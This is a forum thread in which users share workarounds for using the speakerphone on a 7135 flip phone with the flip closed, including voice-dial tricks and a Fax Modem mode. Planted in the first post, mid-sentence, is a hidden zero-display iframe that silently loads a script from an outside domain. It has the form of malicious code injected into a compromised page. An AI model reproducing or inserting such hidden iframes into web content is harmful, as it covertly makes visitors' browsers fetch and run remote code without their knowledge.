+ Reply to Thread

speakerphone on the 7135

has anyone figured out how to use the speakerphone while the unit is closed??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I know it's an old topic. But, I just got the phone. Any ideas? Anyone figure out a way?

E.g. I'm in the middle of a call, and speakerphone is on. I shut the unit, cause it's just better than holding it open and backwards. That disconnects my call. That's bad, anyone have any ideas?

~Josh

There is no way of configuring the 7135 to keep the call alive while closed (unless you are using a headset). Also, even though you are listening to the person on the other end through the speaker, I believe that they are still hearing from you what is picked up by the mic on the bottom right corner of the dial pad.
    Please visit my picture site: Robert-O-Rama :)

Closed shell calls

Setup a voice dial for the person you want to call. Put the phone on speakerphone. Hit the send key to get the phone to prompt for a name. Close the shell then say the name.

OK... is there a prize for tip of the week?

Converged several times now...

Lightbulb Another option...

QUOTE]Setup a voice dial for the person you want to call. Put the phone on speakerphone. Hit the send key to get the phone to prompt for a name. Close the shell then say the name.[/QUOTE]

Train the 7135 "wake-up" command. While the device is connected to the car kit or external power supply, say "wake-up" twice -- then the phone will ask you to state the voice-dial name you'd like to dial. This doesn't even require hitting a key to initiate![

I found this out quite by accident, but it only takes a few steps.

1) Set your phone up in the Fax Modem configuration.

2) Press the Red phone key to bring up the phone side of the phone.

3) Start the Speakerphone. This is optional, but I don't know how you could talk to someone with the flip closed without the speakerphone on.

Place a call--then when you connect close the flip. The call will continue.

To end the call, you need to open the flip and hit the Red phone key.

It's important to note, as long as the Fax Modem remains active in the background, the flip will not end a call.

To get out of this configuration, hit the Home icon to bring up the Palm side of the phone. Once you do that, the flip will work properly again.

I've started using the Fax Modem extensively, and you can close the flip while making Data Calls. It makes for a neater package when using the Wireless Modem.

I haven't tried this with a Web Browser, so I don't know if you can continue downloading files.

One last thing.....This works when you put the phone in Fax Modem configuration WITHOUT placing a data call. If you are using the phone as a modem and you get an incoming call, then closing the flip ends the voice call, but it doesn't end the data call.

previously posted by: Schavlan on sms